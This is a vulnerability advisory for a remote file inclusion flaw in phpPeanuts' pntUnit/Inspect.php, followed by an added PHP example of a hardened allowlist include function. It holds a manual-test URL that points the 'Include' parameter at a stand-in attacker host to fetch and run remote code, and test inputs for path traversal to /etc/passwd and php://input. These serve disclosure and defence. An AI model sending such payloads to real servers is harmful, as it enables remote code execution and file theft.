phpPeanuts Inspect.php Include Variable Remote File Inclusion

2006-11-14T04:19:09
ID OSVDB:30397
Type osvdb
Reporter Hidayat Sagita (hidayat.sagita@gmail.com)
Modified 2006-11-14T04:19:09

Description

Vulnerability Description

phpPeanuts contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to pntUnit/Inspect.php passing the user-supplied 'Include' request variable to a PHP include without validating it. This allows an attacker to supply a URL instead of a local file name, so that a file fetched from a remote host and containing arbitrary PHP code is executed by the vulnerable script with the privileges of the web server.

Solution Description

No fixed release or workaround is currently known to correct this issue. However, phpPeanuts has released a patch that addresses this vulnerability.

Short Description

phpPeanuts contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to pntUnit/Inspect.php passing the user-supplied 'Include' request variable to a PHP include without validating it. This allows an attacker to supply a URL instead of a local file name, so that a file fetched from a remote host and containing arbitrary PHP code is executed by the vulnerable script with the privileges of the web server.

Manual Testing Notes

http://[target]/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://[attacker]/evil_code.txt?
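The trailing '?' in the test URL above turns whatever Inspect.php appends to the 'Include' value (a suffix such as '.php') into a query string for the attacker's server, so the remote file is fetched regardless of the suffix. The following is an added example and not phpPeanuts code or the vendor's patch: it shows the vulnerable include shape the advisory describes as a comment, and beside it a hardened replacement that only includes allowlisted names resolved under a fixed directory. The function name pnt_safe_include_path, the allowlist and the base directory are assumptions; the inputs are constructed and include the advisory's manual-test payload.

```php
<?php
// Added example, not phpPeanuts code. The advisory says pntUnit/Inspect.php
// hands the 'Include' request variable to an include without sanitizing it.
// Function name, allowlist and base directory below are hypothetical.
//
// The vulnerable shape is essentially this (do not deploy):
//     include($_REQUEST['Include']);
// With allow_url_fopen=On (PHP < 5.2.0) or allow_url_include=On (PHP >= 5.2.0)
// a value such as http://[attacker]/evil_code.txt? makes PHP fetch and execute
// the remote file. Turning those ini settings off limits remote inclusion but
// still leaves local file inclusion, so the value itself must be validated.

declare(strict_types=1);

function pnt_safe_include_path(string $requested, string $baseDir, array $allowed): ?string
{
    // Only a plain identifier is acceptable: no scheme (http://, php://),
    // no directory separators, no NUL bytes, no '?' or '#'. '\z' rather than
    // '$' so that a trailing newline cannot slip past the check.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}\z/', $requested)) {
        return null;
    }
    // Allowlist beats blocklist: a well-formed but unknown name is rejected.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    $base = realpath($baseDir);
    if ($candidate === false || $base === false) {
        return null;
    }
    // Containment check in case the allowlist or base dir is ever misconfigured.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Demo: one legitimate include file in a scratch directory (constructed).
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pntUnit_demo_' . getmypid();
mkdir($baseDir);
$legit = $baseDir . DIRECTORY_SEPARATOR . 'TestCaseRunner.php';
file_put_contents($legit, "<?php\necho \"  loaded legitimate test file\\n\";\n");
$allowed = ['TestCaseRunner'];

// Constructed inputs: the advisory's manual-test payload plus common variants.
$inputs = [
    'TestCaseRunner',                      // allowlisted, resolves under $baseDir
    'http://[attacker]/evil_code.txt?',    // the advisory's RFI payload
    '../../../etc/passwd',                 // local traversal
    "TestCaseRunner\0",                    // NUL-byte truncation attempt
    'php://input',                         // stream wrapper, body-controlled code
    'NotOnTheList',                        // well-formed but not allowlisted
];
foreach ($inputs as $value) {
    $path = pnt_safe_include_path($value, $baseDir, $allowed);
    printf("%-36s => %s\n", addcslashes($value, "\0"), $path === null ? 'REJECT' : 'ALLOW');
    if ($path !== null) {
        include $path;
    }
}

unlink($legit);
rmdir($baseDir);
```

Run it with the PHP CLI; only the first input is allowed and includes the scratch file, every other input is rejected before any filesystem or network access takes place. The order of the checks matters: the identifier pattern is tested before the allowlist and before realpath, so hostile values never reach a path operation at all.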

References:

Secunia Advisory ID: 22873
Generic Exploit URL: http://www.milw0rm.com/exploits/2778
FrSIRT Advisory: ADV-2006-4513
CVE-2006-5948
Bugtraq ID: 21057